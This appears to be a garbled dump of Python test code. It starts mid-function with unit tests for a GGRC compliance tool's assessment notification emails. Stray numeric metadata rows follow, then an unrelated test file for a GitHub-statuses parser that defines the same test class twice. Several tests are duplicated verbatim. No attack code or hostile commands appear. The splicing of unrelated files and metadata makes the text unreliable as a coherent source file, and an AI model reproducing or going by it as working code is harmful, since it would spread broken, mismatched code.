self.assertNotIn(u"Assessments in review", content)
self.assertNotIn(u"Declined assessments", content)
self.assertNotIn(u"Reopened assessments", content)
self.assertIn(u"Completed assessments", content)
@patch("ggrc.notifications.common.send_email")
def test_assessment_reopen_notifications_on_edit(self, send_email):
"""Test if updating assessment results in reopen notification."""
self.import_file("assessment_template_no_warnings.csv", safe=False)
self.import_file("assessment_with_templates.csv")
asmts = {asmt.slug: asmt for asmt in Assessment.query}
asmt = Assessment.query.get(asmts["A 1"].id)
asmt_id, asmt_slug = asmt.id, asmt.slug
for i, new_state in enumerate(Assessment.DONE_STATES):
asmt = Assessment.query.get(asmt_id)
asmt.status = new_state
db.session.commit()
self.client.get("/_notifications/send_daily_digest")
self.assertEqual(self._get_notifications().count(), 0)
self.import_data(OrderedDict([
(u"object_type", u"Assessment"),
(u"Code*", asmt_slug),
(u"Title", u"New Assessment 1 title - " + unicode(i)),
]))
query = self._get_notifications(notif_type="assessment_reopened")
self.assertEqual(query.count(), 1)
self.client.get("/_notifications/send_daily_digest")
recipient, _, content = send_email.call_args[0]
self.assertEqual(recipient, u"user@example.com")
self.assertIn(u"Reopened assessments", content)
@unittest.skip("An issue needs to be fixed.")
@patch("ggrc.notifications.common.send_email")
def test_assessment_reopen_notifications_on_ca_edit(self, send_email):
"""Test if updating assessment's CA value in reopen notification."""
CAD(definition_type="assessment", title="CA_misc_remarks")
self.import_file("assessment_template_no_warnings.csv")
self.import_file("assessment_with_templates.csv")
asmts = {asmt.slug: asmt for asmt in Assessment.query}
asmt = Assessment.query.get(asmts["A 1"].id)
asmt_id, asmt_slug = asmt.id, asmt.slug
for i, new_state in enumerate(Assessment.DONE_STATES):
asmt = Assessment.query.get(asmt_id)
asmt.status = new_state
db.session.commit()
self.client.get("/_notifications/send_daily_digest")
self.assertEqual(self._get_notifications().count(), 0)
self.import_data(OrderedDict([
(u"object_type", u"Assessment"),
(u"Code*", asmt_slug),
(u"CA_misc_remarks", u"CA new value" + unicode(i)),
]))
query = self._get_notifications(notif_type="assessment_reopened")
self.assertEqual(query.count(), 1)
self.client.get("/_notifications/send_daily_digest")
recipient, _, content = send_email.call_args[0]
self.assertEqual(recipient, u"user@example.com")
self.assertIn(u"Reopened assessments", content)
@unittest.skip("An issue needs to be fixed.")
@patch("ggrc.notifications.common.send_email")
def test_assessment_reopen_notifications_on_url_edit(self, send_email):
"""Test if updating assessment's URLs results in reopen notification."""
self.import_file("assessment_template_no_warnings.csv")
self.import_file("assessment_with_templates.csv")
asmts = {asmt.slug: asmt for asmt in Assessment.query}
asmt = Assessment.query.get(asmts["A 1"].id)
asmt_id, asmt_slug = asmt.id, asmt.slug
for i, new_state in enumerate(Assessment.DONE_STATES):
asmt = Assessment.query.get(asmt_id)
asmt.status = new_state
db.session.commit()
self.client.get("/_notifications/send_daily_digest")
self.assertEqual(self._get_notifications().count(), 0)
self.import_data(OrderedDict([
(u"object_type", u"Assessment"),
(u"Code*", asmt_slug),
(u"Evidence Url", u"www.foo-url-{}.bar".format(i)),
]))
query = self._get_notifications(notif_type="assessment_reopened")
self.assertEqual(query.count(), 1)
self.client.get("/_notifications/send_daily_digest")
recipient, _, content = send_email.call_args[0]
self.assertEqual(recipient, u"user@example.com")
self.assertIn(u"Reopened assessments", content)
@unittest.skip("An issue needs to be fixed.")
@patch("ggrc.notifications.common.send_email")
def test_assessment_reopen_notifications_on_evidence_change(
self, send_email
):
"""Test if assessment evidence change results in reopen notification."""
self.import_file("assessment_template_no_warnings.csv")
self.import_file("assessment_with_templates.csv")
asmts = {asmt.slug: asmt for asmt in Assessment.query}
asmt = Assessment.query.get(asmts["A 1"].id)
asmt_id, asmt_slug = asmt.id, asmt.slug
for i, new_state in enumerate(Assessment.DONE_STATES):
asmt = Assessment.query.get(asmt_id)
asmt.status = new_state
db.session.commit()
self.client.get("/_notifications/send_daily_digest")
self.assertEqual(self._get_notifications().count(), 0)
self.import_data(OrderedDict([
(u"object_type", u"Assessment"),
(u"Code*", asmt_slug),
(
u"Evidence File",
u"https://gdrive.com/qwerty{0}/view evidence-{0}.txt".format(i)
),
]))
query = self._get_notifications(notif_type="assessment_reopened")
self.assertEqual(query.count(), 1)
self.client.get("/_notifications/send_daily_digest")
recipient, _, content = send_email.call_args[0]
self.assertEqual(recipient, u"user@example.com")
self.assertIn(u"Reopened assessments", content)
@unittest.skip("An issue needs to be fixed.")
@patch("ggrc.notifications.common.send_email")
def test_assessment_reopen_notifications_on_person_change(self, send_email):
"""Test if updating assessment people results in a reopen notification."""
self.import_file("assessment_template_no_warnings.csv")
self.import_file("assessment_with_templates.csv")
asmts = {asmt.slug: asmt for asmt in Assessment.query}
asmt = Assessment.query.get(asmts["A 1"].id)
asmt_id, asmt_slug = asmt.id, asmt.slug
for i, new_state in enumerate(Assessment.DONE_STATES):
asmt = Assessment.query.get(asmt_id)
asmt.status = new_state
db.session.commit()
self.client.get("/_notifications/send_daily_digest")
self.assertEqual(self._get_notifications().count(), 0)
self.import_data(OrderedDict([
(u"object_type", u"Assessment"),
(u"Code*", asmt_slug),
(u"Assignee*", u"john{}@doe.com".format(i)),
]))
query = self._get_notifications(notif_type="assessment_reopened")
self.assertEqual(query.count(), 1)
self.client.get("/_notifications/send_daily_digest")
recipient, _, content = send_email.call_args[0]
self.assertEqual(recipient, u"user@example.com")
self.assertIn(u"Reopened assessments", content)
@ddt.ddt
class TestAssignableNotificationUsingAPI(TestAssignableNotification):
"""Tests for notifications when interacting with objects through an API."""
def setUp(self):
super(TestAssignableNotificationUsingAPI, self).setUp()
self.api_helper = api_helper.Api()
self.objgen = generator.ObjectGenerator()
@patch("ggrc.notifications.common.send_email")
def test_assessment_without_verifiers(self, send_email):
"""Test setting notification entries for simple assessments.
This function tests that each assessment gets an entry in the
notifications table after it's been created.
"""
with freeze_time("2015-04-01"):
self.assertEqual(self._get_notifications().count(), 0)
self.import_file("assessment_template_no_warnings.csv", safe=False)
self.import_file("assessment_with_templates.csv")
asmts = {asmt.slug: asmt for asmt in Assessment.query}
notifs = self._get_notifications(notif_type="assessment_open").all()
self.assertEqual(len(notifs), 6)
revisions = Revision.query.filter(
Revision.resource_type == 'Notification',
Revision.resource_id.in_([notif.id for notif in notifs])
).count()
self.assertEqual(revisions, 6)
self.api_helper.delete(asmts["A 1"])
self.api_helper.delete(asmts["A 6"])
self.assertEqual(self._get_notifications().count(), 4)
self.client.get("/_notifications/send_daily_digest")
self.assertEqual(self._get_notifications().count(), 0)
# editing an assessment in an active state should result in an
# "updated" notification
asmt = Assessment.query.get(asmts["A 5"].id)
self.api_helper.modify_object(
asmt, {"status": Assessment.PROGRESS_STATE})
self.client.get("/_notifications/send_daily_digest")
self.assertEqual(self._get_notifications().count(), 0)
asmt = Assessment.query.get(asmts["A 5"].id)
self.api_helper.modify_object(asmt, {"description": "new description"})
query = self._get_notifications(notif_type="assessment_updated")
self.assertEqual(query.count(), 1)
# the assessment updated notification should be sent even if there exists
# a status change notification, regardless of the order of actions
asmt = Assessment.query.get(asmts["A 5"].id)
self.api_helper.modify_object(
asmt, {"status": Assessment.DONE_STATE})
asmt = Assessment.query.get(asmts["A 5"].id)
self.api_helper.modify_object(asmt, {"description": "new description 2"})
self.client.get("/_notifications/send_daily_digest")
_, _, content = send_email.call_args[0]
self.assertIn(u"Assessments have been updated", content)
@patch("ggrc.notifications.common.send_email")
def test_assessment_with_verifiers(self, _):
"""Test notifications entries for declined assessments.
This tests makes sure that there are extra notification entries added when
an assessment has been declined.
"""
with freeze_time("2015-04-01"):
self.assertEqual(self._get_notifications().count(), 0)
self.import_file("assessment_template_no_warnings.csv", safe=False)
self.import_file("assessment_with_templates.csv")
asmts = {asmt.slug: asmt for asmt in Assessment.query}
notifications = self._get_notifications().all()
self.assertEqual(len(notifications), 7)
revisions = Revision.query.filter(
Revision.resource_type == 'Notification',
Revision.resource_id.in_([notif.id for notif in notifications])
).count()
self.assertEqual(revisions, 7)
self.client.get("/_notifications/send_daily_digest")
self.assertEqual(self._get_notifications().count(), 0)
asmt1 = Assessment.query.get(asmts["A 5"].id)
# start and finish assessment 1
self.api_helper.modify_object(asmt1,
{"status": Assessment.PROGRESS_STATE})
self.assertEqual(self._get_notifications().count(), 1)
self.api_helper.modify_object(asmt1, {"status": Assessment.DONE_STATE})
self.assertEqual(self._get_notifications().count(), 1)
# decline assessment 1
self.api_helper.modify_object(asmt1,
{"status": Assessment.PROGRESS_STATE})
self.assertEqual(self._get_notifications().count(), 2)
self.api_helper.modify_object(asmt1, {"status": Assessment.DONE_STATE})
self.assertEqual(self._get_notifications().count(), 1)
# decline assessment 1 the second time
self.api_helper.modify_object(asmt1,
{"status": Assessment.PROGRESS_STATE})
self.assertEqual(self._get_notifications().count(), 2)
asmt6 = Assessment.query.get(asmts["A 6"].id)
# start and finish assessment 6
self.api_helper.modify_object(asmt6,
{"status": Assessment.PROGRESS_STATE})
self.assertEqual(self._get_notifications().count(), 3)
self.api_helper.modify_object(asmt6, {"status": Assessment.DONE_STATE})
self.assertEqual(self._get_notifications().count(), 3)
# decline assessment 6
self.api_helper.modify_object(asmt6,
{"status": Assessment.PROGRESS_STATE})
self.assertEqual(self._get_notifications().count(), 4)
# send all notifications
self.client.get("/_notifications/send_daily_digest")
self.assertEqual(self._get_notifications().count(), 0)
# Refresh the object because of the lost session due to the get call.
asmt6 = Assessment.query.get(asmts["A 6"].id)
self.api_helper.modify_object(asmt6,
{"status": Assessment.PROGRESS_STATE})
self.assertEqual(self._get_notifications().count(), 0)
self.api_helper.modify_object(asmt6,
{"status": Assessment.DONE_STATE})
self.assertEqual(self._get_notifications().count(), 1)
self.api_helper.modify_object(asmt6,
{"status": Assessment.VERIFIED_STATE})
self.assertEqual(self._get_notifications().count(), 1)
self.api_helper.modify_object(asmt6,
{"status": Assessment.PROGRESS_STATE})
self.assertEqual(self._get_notifications().count(), 1)
# decline assessment 6
self.api_helper.modify_object(asmt6, {"status": Assessment.DONE_STATE})
self.assertEqual(self._get_notifications().count(), 1)
self.api_helper.modify_object(asmt6,
{"status": Assessment.PROGRESS_STATE})
self.assertEqual(self._get_notifications().count(), 2)
@patch("ggrc.notifications.common.send_email")
def test_assessment_started_notification(self, send_email):
"""Test that starting an Assessment results in a notification."""
with freeze_time("2015-04-01"):
self.import_file("assessment_template_no_warnings.csv", safe=False)
self.import_file("assessment_with_templates.csv")
asmts = {asmt.slug: asmt for asmt in Assessment.query}
self.client.get("/_notifications/send_daily_digest")
self.assertEqual(self._get_notifications().count(), 0)
asmt1 = Assessment.query.get(asmts["A 5"].id)
self.api_helper.modify_object(asmt1,
{"status": Assessment.PROGRESS_STATE})
self.client.get("/_notifications/send_daily_digest")
recipient, _, content = send_email.call_args[0]
self.assertEqual(recipient, u"user@example.com")
self.assertRegexpMatches(content, ur"Assessment\s+has\s+been\s+started")
@patch("ggrc.notifications.common.send_email")
def test_editing_not_started_assessment(self, send_email):
"""Test that Assessment started notification masks updated notification.
"""
with freeze_time("2015-04-01"):
self.import_file("assessment_template_no_warnings.csv", safe=False)
self.import_file("assessment_with_templates.csv")
asmts = {asmt.slug: asmt for asmt in Assessment.query}
self.client.get("/_notifications/send_daily_digest")
self.assertEqual(self._get_notifications().count(), 0)
asmt1 = Assessment.query.get(asmts["A 5"].id)
self.api_helper.modify_object(
asmt1, {"description": "new asmt5 description"})
self.client.get("/_notifications/send_daily_digest")
recipient, _, content = send_email.call_args[0]
self.assertEqual(recipient, u"user@example.com")
self.assertRegexpMatches(content, ur"Assessment\s+has\s+been\s+started")
self.assertIn(u"Assessments have been updated", content)
@patch("ggrc.notifications.common.send_email")
def test_reverting_assessment_status_changes(self, _):
"""Test that undoing a stautus change might NOT trigger a notification.
One use case is when a user verifies an assessment in review, but then
clicks the Undo button to revert the change. A status change notification
should not be sent in such cases.
"""
self.import_file("assessment_template_no_warnings.csv", safe=False)
self.import_file("assessment_with_templates.csv")
asmts = {asmt.slug: asmt for asmt in Assessment.query}
self.client.get("/_notifications/send_daily_digest")
self.assertEqual(self._get_notifications().count(), 0)
# mark Assessment as in review, verify it, then revert the change
asmt = Assessment.query.get(asmts["A 4"].id)
self.api_helper.modify_object(
asmt, {"status": Assessment.DONE_STATE})
asmt = Assessment.query.get(asmts["A 4"].id)
self.api_helper.modify_object(
asmt,
{"status": Assessment.FINAL_STATE, "verified_date": datetime.now()}
)
# clear notifications
self.client.get("/_notifications/send_daily_digest")
self.assertEqual(self._get_notifications().count(), 0)
# changing the status back to the previous one is effectively reopening
# an Assessment
asmt = Assessment.query.get(asmts["A 4"].id)
self.api_helper.modify_object(
asmt, {"status": Assessment.DONE_STATE, "verified_date": None})
query = self._get_notifications(notif_type="assessment_reopened")
self.assertEqual(query.count(), 0)
# there should also be no change notification
query = self._get_notifications(notif_type="assessment_updated")
self.assertEqual(query.count(), 0)
@patch("ggrc.notifications.common.send_email")
def test_multiple_assessment_state_changes_notification(self, send_email):
"""Test if several assessment state changes result in a single notification.
Users should only be notificed about the last state change, and not about
every state change that happened.
"""
self.import_file("assessment_template_no_warnings.csv", safe=False)
self.import_file("assessment_with_templates.csv")
asmts = {asmt.slug: asmt for asmt in Assessment.query}
asmt = Assessment.query.get(asmts["A 1"].id)
asmt_id = asmt.id
asmt.status = Assessment.START_STATE
db.session.commit()
self.client.get("/_notifications/send_daily_digest")
self.assertEqual(self._get_notifications().count(), 0)
# make multiple state transitions and check that only the last one is
# actually retained
states = (
Assessment.PROGRESS_STATE,
Assessment.DONE_STATE,
Assessment.PROGRESS_STATE,
Assessment.FINAL_STATE,
)
for new_state in states:
asmt = Assessment.query.get(asmt_id)
self.api_helper.modify_object(asmt, {"status": new_state})
self.client.get("/_notifications/send_daily_digest")
recipient, _, content = send_email.call_args[0]
self.assertEqual(recipient, u"user@example.com")
self.assertNotIn(u"Assessments in review", content)
self.assertNotIn(u"Declined assessments", content)
self.assertNotIn(u"Reopened assessments", content)
self.assertIn(u"Completed assessments", content)
@patch("ggrc.notifications.common.send_email")
def test_assessment_reopen_notifications_on_edit(self, send_email):
"""Test if updating assessment results in reopen notification."""
self.import_file("assessment_template_no_warnings.csv", safe=False)
self.import_file("assessment_with_templates.csv")
asmts = {asmt.slug: asmt for asmt in Assessment.query}
asmt = Assessment.query.get(asmts["A 1"].id)
asmt_id, asmt_slug = asmt.id, asmt.slug
for i, new_state in enumerate(Assessment.DONE_STATES):
asmt = Assessment.query.get(asmt_id)
asmt.status = new_state
db.session.commit()
self.client.get("/_notifications/send_daily_digest")
self.assertEqual(self._get_notifications().count(), 0)
self.import_data(OrderedDict([
(u"object_type", u"Assessment"),
(u"Code*", asmt_slug),
(u"Title", u"New Assessment 1 title - " + unicode(i)),
]))
query = self._get_notifications(notif_type="assessment_reopened")
self.assertEqual(query.count(), 1)
self.client.get("/_notifications/send_daily_digest")
recipient, _, content = send_email.call_args[0]
self.assertEqual(recipient, u"user@example.com")
self.assertIn(u"Reopened assessments", content)
@patch("ggrc.notifications.common.send_email")
def test_changing_custom_attributes_triggers_change_notification(self, _):
"""Test that updating Assessment's CA value results in change notification.
"""
CAD(definition_type="assessment", title="CA 1",)
cad2 = CAD(definition_type="assessment", title="CA 2",)
self.import_file("assessment_template_no_warnings.csv", safe=False)
self.import_file("assessment_with_templates.csv")
asmts = {asmt.slug: asmt for asmt in Assessment.query}
self.client.get("/_notifications/send_daily_digest")
self.assertEqual(self._get_notifications().count(), 0)
# set initial CA value on the Assessment (also to put it into "In Progress"
cad2 = CustomAttributeDefinition.query.filter(
CustomAttributeDefinition.title == "CA 2").one()
val2 = CustomAttributeValue(attribute_value="1a2b3", custom_attribute=cad2)
asmt4 = Assessment.query.get(asmts["A 4"].id)
self.api_helper.modify_object(
asmt4,
{
"custom_attribute_values": [{
"attributable_id": asmt4.id,
"attributable_type": "Assessment",
"id": val2.id,
"custom_attribute_id": cad2.id,
"attribute_value": val2.attribute_value,
}]
}
)
# there should be a notification...
self.assertEqual(
self._get_notifications(notif_type="assessment_updated").count(), 1)
# now change the CA value and check if notification gets generated
cad2 = CustomAttributeDefinition.query.filter(
CustomAttributeDefinition.title == "CA 2").one()
val2 = CustomAttributeValue(attribute_value="NEW", custom_attribute=cad2)
asmt4 = Assessment.query.get(asmts["A 4"].id)
self.api_helper.modify_object(
asmt4,
{
"custom_attribute_values": [{
"attributable_id": asmt4.id,
"attributable_type": "Assessment",
"custom_attribute_id": cad2.id,
"id": val2.id,
"attribute_value": val2.attribute_value,
}]
}
)
notifs = self._get_notifications(notif_type="assessment_updated").all()
self.assertEqual(len(notifs), 1)
@patch("ggrc.notifications.common.send_email")
def test_directly_completing_assessments(self, _):
"""Test that immediately finishing an Assessment produces a notification.
"Immediately" here means directly sending an Assessment to either the
"Completed", or the "In Review" state, skipping the "In Progress"
state.
"""
self.import_file("assessment_template_no_warnings.csv", safe=False)
self.import_file("assessment_with_templates.csv")
asmts = {asmt.slug: asmt for asmt in Assessment.query}
self.client.get("/_notifications/send_daily_digest")
self.assertEqual(self._get_notifications().count(), 0)
# directly sending an Assessment to the "In Review" state
asmt4 = Assessment.query.get(asmts["A 4"].id)
self.api_helper.modify_object(asmt4,
{"status": Assessment.DONE_STATE})
self.assertEqual(self._get_notifications().count(), 1)
# clear notifications
self.client.get("/_notifications/send_daily_digest")
self.assertEqual(self._get_notifications().count(), 0)
# directly sending an Assessment to the "Completed" state
asmt5 = Assessment.query.get(asmts["A 5"].id)
self.api_helper.modify_object(asmt5,
{"status": Assessment.FINAL_STATE})
self.assertEqual(self._get_notifications().count(), 1)
@patch("ggrc.notifications.common.send_email")
def test_changing_assigned_people_triggers_notifications(self, _):
"""Test that changing Assessment people results in change notification.
Adding (removing) a person to (from) Assessment should be detected and
considered an Assessment change.
"""
self.import_file("assessment_template_no_warnings.csv", safe=False)
self.import_file("assessment_with_templates.csv")
asmts = {asmt.slug: asmt for asmt in Assessment.query}
self.client.get("/_notifications/send_daily_digest")
self.assertEqual(self._get_notifications().count(), 0)
asmt = Assessment.query.get(asmts["A 5"].id)
# add an Assignee, there should be no notifications because the Assessment
# has not been started yet
person = factories.PersonFactory()
response, relationship = self.objgen.generate_relationship(
person, asmt, attrs={"AssigneeType": "Assignees"})
self.assertEqual(response.status_code, 201)
change_notifs = self._get_notifications(notif_type="assessment_updated")
self.assertEqual(change_notifs.count(), 0)
asmt = Assessment.query.get(asmts["A 5"].id)
# move Assessment to to "In Progress" state and clear notifications
self.api_helper.modify_object(
asmt, {"status": Assessment.PROGRESS_STATE})
self.client.get("/_notifications/send_daily_digest")
self.assertEqual(self._get_notifications().count(), 0)
asmt = Assessment.query.get(asmts["A 5"].id)
# assign another Assignee, change notification should be created
person2 = factories.PersonFactory()
response, _ = self.objgen.generate_relationship(
person2, asmt, attrs={"AssigneeType": "Assignees"})
self.assertEqual(response.status_code, 201)
change_notifs = self._get_notifications(notif_type="assessment_updated")
self.assertEqual(change_notifs.count(), 1)
# clear notifications, assign the same person as Verfier, check for
# change notification
self.client.get("/_notifications/send_daily_digest")
self.assertEqual(change_notifs.count(), 0)
asmt = Assessment.query.get(asmts["A 5"].id)
# clear notifications, delete an Assignee, test for change notification
self.client.get("/_notifications/send_daily_digest")
self.assertEqual(change_notifs.count(), 0)
asmt = Assessment.query.get(asmts["A 5"].id)
self.api_helper.delete(relationship)
change_notifs = self._get_notifications(notif_type="assessment_updated")
self.assertEqual(change_notifs.count(), 1)
# clear notifications, delete one of the person's roles, test for
# change notification
self.client.get("/_notifications/send_daily_digest")
self.assertEqual(change_notifs.count(), 0)
# changing people if completed should result in "reopened" notification
# TODO: contrary to how relations to Documents behave, assigning a Person
# to an Assessment causes the latter to be immediately moved to the
# "In Progress" state, making the relationship change handler to think that
# the Assessment was modified in the "In Progress" state, resulting in
# a missing assessment_reopened notification. We thus skip this check for
# the time being.
# asmt = Assessment.query.get(asmts["A 5"].id)
# self.api_helper.modify_object(
# asmt, {"status": Assessment.FINAL_STATE})
# self.client.get("/_notifications/send_daily_digest")
# self.assertEqual(self._get_notifications().count(), 0)
# asmt = Assessment.query.get(asmts["A 5"].id)
# person = factories.PersonFactory()
# response, relationship = self.objgen.generate_relationship(
# person, asmt, attrs={"AssigneeType": "Assignees"})
# self.assertEqual(response.status_code, 201)
# reopened_notifs = self._get_notifications(
# notif_type="assessment_reopened")
# self.assertEqual(reopened_notifs.count(), 1)
@patch("ggrc.notifications.common.send_email")
def test_changing_assessment_urls_triggers_notifications(self, _):
"""Test that changing Assessment URLs results in change notification.
Adding (removing) a URL to (from) Assessment should be detected and
considered an Assessment change.
"""
self.import_file("assessment_template_no_warnings.csv", safe=False)
self.import_file("assessment_with_templates.csv")
asmts = {asmt.slug: asmt for asmt in Assessment.query}
self.client.get("/_notifications/send_daily_digest")
self.assertEqual(self._get_notifications().count(), 0)
asmt = Assessment.query.get(asmts["A 5"].id)
# add a URL, there should be no notifications because the Assessment
# has not been started yet
url = factories.EvidenceUrlFactory(link="www.foo.com")
response, relationship = self.objgen.generate_relationship(url, asmt)
self.assertEqual(response.status_code, 201)
change_notifs = self._get_notifications(notif_type="assessment_updated")
self.assertEqual(change_notifs.count(), 0)
asmt = Assessment.query.get(asmts["A 5"].id)
# move Assessment to to "In Progress" state and clear notifications
self.api_helper.modify_object(
asmt, {"status": Assessment.PROGRESS_STATE})
self.client.get("/_notifications/send_daily_digest")
self.assertEqual(self._get_notifications().count(), 0)
asmt = Assessment.query.get(asmts["A 5"].id)
# add another URL, change notification should be created
url2 = factories.EvidenceUrlFactory(link="www.bar.com")
response, _ = self.objgen.generate_relationship(url2, asmt)
self.assertEqual(response.status_code, 201)
change_notifs = self._get_notifications(notif_type="assessment_updated")
self.assertEqual(change_notifs.count(), 1)
# clear notifications, delete a URL, test for change notification
self.client.get("/_notifications/send_daily_digest")
self.assertEqual(change_notifs.count(), 0)
asmt = Assessment.query.get(asmts["A 5"].id)
self.api_helper.delete(relationship)
change_notifs = self._get_notifications(notif_type="assessment_updated")
self.assertEqual(change_notifs.count(), 1)
# changing URLs if completed should result in "reopened" notification
asmt = Assessment.query.get(asmts["A 5"].id)
self.api_helper.modify_object(
asmt, {"status": Assessment.FINAL_STATE})
self.client.get("/_notifications/send_daily_digest")
self.assertEqual(self._get_notifications().count(), 0)
asmt = Assessment.query.get(asmts["A 5"].id)
url = factories.EvidenceUrlFactory(link="www.abc.com")
response, relationship = self.objgen.generate_relationship(url, asmt)
self.assertEqual(response.status_code, 201)
reopened_notifs = self._get_notifications(notif_type="assessment_reopened")
self.assertEqual(reopened_notifs.count(), 1)
@ddt.data("/_notifications/send_daily_digest", "nightly_cron_endpoint")
@patch("ggrc.notifications.common.send_email")
def test_notifications_missing_revision(self, url, send_email):
"""Test notifications with missing revision"""
self.import_file("assessment_template_no_warnings.csv", safe=False)
self.import_file("assessment_with_templates.csv")
asmt = Assessment.query.filter_by(slug="A 1").first()
self.api_helper.put(asmt, {"title": "New title"})
Revision.query.filter_by(
resource_id=asmt.id,
resource_type=asmt.type
).delete()
db.session.commit()
self.client.get(url)
_, _, content = send_email.call_args[0]
self.assertIn(u"Assessments have been updated", content)
@patch("ggrc.notifications.common.send_email")
def test_comment_notifications_after_import_file(self, send_email):
"""Test comment notification after importing from file"""
self.assertEqual(len(all_models.Comment.query.all()), 0)
self.import_file("import_comments.csv", safe=False)
self.assertNotEqual(len(all_models.Comment.query.all()), 0)
comments = all_models.Comment.query.all()
comments = [comment.description for comment in comments]
self.client.get("/_notifications/send_daily_digest")
_, _, content = send_email.call_args[0]
for comment in comments:
self.assertIn(comment, content)
def test_evidence_notifications_missing_revision(self):
"""Test evidence notification after adding to assessment
with missing revision"""
self.import_file("assessment_template_no_warnings.csv", safe=False)
self.import_file("assessment_with_templates.csv")
slug = "A 2"
asmt = Assessment.query.filter_by(slug=slug).first()
Revision.query.filter_by(
resource_id=asmt.id,
resource_type=asmt.type
).delete()
db.session.commit()
expected_evidence_url = u"www.foo-url.bar"
evidence_data = dict(
title=expected_evidence_url,
kind="URL",
link=expected_evidence_url,
)
_, evidence = self.objgen.generate_object(
all_models.Evidence,
evidence_data
)
asmt = Assessment.query.filter_by(slug=slug).first()
response = self.api_helper.put(asmt, {
"actions": {
"add_related": [{"id": evidence.id, "type": "Evidence"}]
}
})
self.assert500(response)
self.assertEqual(response.json["message"], errors.MISSING_REVISION)
url = "/api/assessments/{}/related_objects".format(asmt.id)
response = self.client.get(url)
self.assert200(response)
content = response.json
evidence_urls = content["Evidence:URL"]
self.assertEqual(len(evidence_urls), 0)
def test_comment_notifications_missing_revision(self):
"""Test comment notification after adding to assessment
with missing revision"""
self.import_file("assessment_template_no_warnings.csv", safe=False)
self.import_file("assessment_with_templates.csv")
slug = "A 1"
asmt = Assessment.query.filter_by(slug=slug).first()
Revision.query.filter_by(
resource_id=asmt.id,
resource_type=asmt.type
).delete()
db.session.commit()
expected_comment = "some comment"
asmt = Assessment.query.filter_by(slug=slug).first()
request_data = [{
"comment": {
"description": expected_comment,
"send_notification": True,
"context": None
}
}]
response = self.api_helper.post(all_models.Comment, request_data)
self.assert200(response)
comment = all_models.Comment.query.first()
with patch("ggrc.notifications.people_mentions.handle_comment_mapped"):
response = self.api_helper.put(asmt, {
"actions": {
"add_related": [{"id": comment.id, "type": "Comment"}]
}
})
self.assert500(response)
self.assertEqual(response.json["message"], errors.MISSING_REVISION)
url = "/api/assessments/{}/related_objects".format(asmt.id)
response = self.client.get(url)
self.assert200(response)
comments = response.json["Comment"]
self.assertEqual(len(comments), 0)
| 38.919794
| 80
| 0.700616
| 6,557
| 52,892
| 5.448223
| 0.063139
| 0.074348
| 0.055425
| 0.053298
| 0.855363
| 0.832718
| 0.821856
| 0.80243
| 0.788657
| 0.768755
| 0
| 0.00763
| 0.177361
| 52,892
| 1,358
| 81
| 38.948454
| 0.813404
| 0.075985
| 0
| 0.805585
| 0
| 0
| 0.208092
| 0.114871
| 0
| 0
| 0
| 0.000736
| 0.195489
| 0
| null | null | 0
| 0.108486
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
ab0e9431a1809999fe3f59fcce2a2324fa11f14a
| 4,813
|
py
|
Python
|
TP3/test_parse_gh_statuses_file.py
|
will-afs/PYT
|
e2ad09d3449a28124a033dcc7ddd0429cbd18239
|
[
"MIT"
] | null | null | null |
TP3/test_parse_gh_statuses_file.py
|
will-afs/PYT
|
e2ad09d3449a28124a033dcc7ddd0429cbd18239
|
[
"MIT"
] | null | null | null |
TP3/test_parse_gh_statuses_file.py
|
will-afs/PYT
|
e2ad09d3449a28124a033dcc7ddd0429cbd18239
|
[
"MIT"
] | null | null | null |
import unittest
import os
from parse_gh_statuses_file import get_status_from_gh_statuses_data_file, get_statuses_from_gh_statuses_data_file
DATA_FILE_URL = '/home/william/Programming/PYT/TP3/'
DATA_FILE_URI = 'data'
DATA_FILE_URN = DATA_FILE_URL + DATA_FILE_URI
class TestParseGHStatusesFile(unittest.TestCase):
def test_get_status_from_gh_statuses_data_file_file_not_found(self):
data_file_uri='/home/william/Programming/PYT/TP3/file_not_exists'
data_file_urn = DATA_FILE_URL + data_file_uri
with self.assertRaises(FileNotFoundError):
get_status_from_gh_statuses_data_file(
gh_statuses_data_file_path=data_file_urn,
status_id = 1
)
def test_get_status_from_gh_statuses_data_file_id_not_found(self):
status = get_status_from_gh_statuses_data_file(
status_id = -1,
gh_statuses_data_file_path=DATA_FILE_URN
)
self.assertEqual(status, {})
def test_get_status_from_gh_statuses_data_file_success(self):
status = get_status_from_gh_statuses_data_file(
status_id = 2489368118,
gh_statuses_data_file_path=DATA_FILE_URN
)
self.assertEqual(int(status['id']), 2489368118)
def test_get_status_from_gh_statuses_data_file_wrong_file_format(self):
data_file_uri='wrong_file_format'
data_file_urn = DATA_FILE_URL + data_file_uri
status = get_status_from_gh_statuses_data_file(
status_id = 2489368118,
gh_statuses_data_file_path=data_file_urn
)
self.assertEqual(status, {})
class TestParseGHStatusesFile(unittest.TestCase):
def test_get_statuses_from_gh_statuses_data_file_full_success(self):
statuses = get_statuses_from_gh_statuses_data_file(
gh_statuses_data_file_path=DATA_FILE_URN,
)
self.assertEqual(len(statuses), 7702)
self.assertEqual(int(statuses[7701]['id']), 2489395761)
def test_get_statuses_from_gh_statuses_data_file_page_success(self):
statuses = get_statuses_from_gh_statuses_data_file(
gh_statuses_data_file_path=DATA_FILE_URN,
page=2,
page_size=3
)
self.assertEqual(len(statuses), 3)
self.assertEqual(int(statuses[0]['id']),2489368095)
def test_get_statuses_from_gh_statuses_data_file_not_found(self):
data_file_uri='/home/william/Programming/PYT/TP3/file_not_exists'
data_file_urn = DATA_FILE_URL + data_file_uri
with self.assertRaises(FileNotFoundError):
get_statuses_from_gh_statuses_data_file(
gh_statuses_data_file_path=data_file_urn,
)
def test_get_statuses_from_gh_statuses_data_file_wrong_page_number_value(self):
with self.assertRaises(ValueError):
get_statuses_from_gh_statuses_data_file(
gh_statuses_data_file_path=DATA_FILE_URN,
page=-88
)
def test_get_statuses_from_gh_statuses_data_file_page_number_out_of_range(self):
with self.assertRaises(IndexError):
get_statuses_from_gh_statuses_data_file(
gh_statuses_data_file_path=DATA_FILE_URN,
page=1000000000000
)
def test_get_statuses_from_gh_statuses_data_file_wrong_page_size_value(self):
with self.assertRaises(ValueError):
get_statuses_from_gh_statuses_data_file(
gh_statuses_data_file_path=DATA_FILE_URN,
page_size=-88
)
if __name__ == '__main__':
unittest.main()
| 50.135417
| 113
